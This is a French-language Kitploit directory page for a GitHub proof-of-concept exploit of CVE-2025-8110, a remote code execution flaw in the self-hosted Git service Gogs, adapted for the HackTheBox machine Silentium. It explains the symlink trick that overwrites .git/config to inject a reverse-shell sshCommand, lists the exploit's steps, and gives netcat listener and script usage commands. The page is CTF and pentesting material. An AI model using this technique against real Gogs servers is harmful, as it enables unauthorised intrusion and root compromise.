Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/ixzodiak/cve-2025-8110
ExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Exploit du service Gogs et obtention de l'utilisateur root

Voir le dépôt
49il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8110 — PoC RCE Gogs (Silentium / HackTheBox)

Avertissement : Cet outil est strictement destiné à des fins éducatives et à des tests d'intrusion autorisés. Utilisez-le uniquement contre des systèmes pour lesquels vous avez une autorisation explicite.


Il s'agit d'une version modifiée de zAbuQasem/gogs-CVE-2025-8110, adaptée pour fonctionner contre la machine Silentium sur HackTheBox. Le PoC original nécessitait des ajustements pour gérer la configuration spécifique de Gogs et le flux d'authentification de Silentium.


La vulnérabilité

CVE-2025-8110 est une vulnérabilité d'exécution de code à distance (RCE) dans Gogs, un service Git auto-hébergé.

Le point de terminaison de l'API de mise à jour de fichier de Gogs (PUT /api/v1/repos/.../contents/<file>) ne valide pas si le fichier cible est un lien symbolique. Un attaquant authentifié peut pousser un lien symbolique dans un dépôt pointant vers .git/config, puis utiliser l'API pour l'écraser avec une charge utile malveillante. Cette charge utile injecte une commande sshCommand personnalisée dans la configuration git, que Gogs exécute côté serveur lors de la prochaine opération SSH sur ce dépôt, entraînant une exécution de code à distance.


Ce que fait le PoC

Télécharger l’outil
  1. S'authentifie à Gogs et récupère un jeton CSRF depuis la page de connexion.
  2. Génère un jeton API Gogs via la page des paramètres utilisateur.
  3. Crée un nouveau dépôt via l'API avec SSH activé.
  4. Clone le dépôt localement, place un lien symbolique (malicious_link -> .git/config), et le pousse.
  5. Appelle l'API de mise à jour de fichier sur le lien symbolique, en écrivant un .git/config malveillant contenant sshCommand = <reverse shell>.
  6. Gogs suit le lien symbolique et écrase son propre .git/config, déclenchant le shell lors de la prochaine opération SSH.

Utilisation

Installer les dépendances :

root@kitploit:~
pip install -r requirements.txt

Lancer un écouteur :

root@kitploit:~
nc -lvnp <PORT>

Exécuter l'exploit :

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Optionnel — routage via Burp Suite :

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
OptionDescription
-uURL de base de Gogs
-lhVotre IP d'attaque (hôte du reverse shell)
-lpVotre port d'écoute
-unVotre nom d'utilisateur Gogs enregistré
-pwVotre mot de passe Gogs
-x(Optionnel) Router le trafic via Burp sur localhost:8080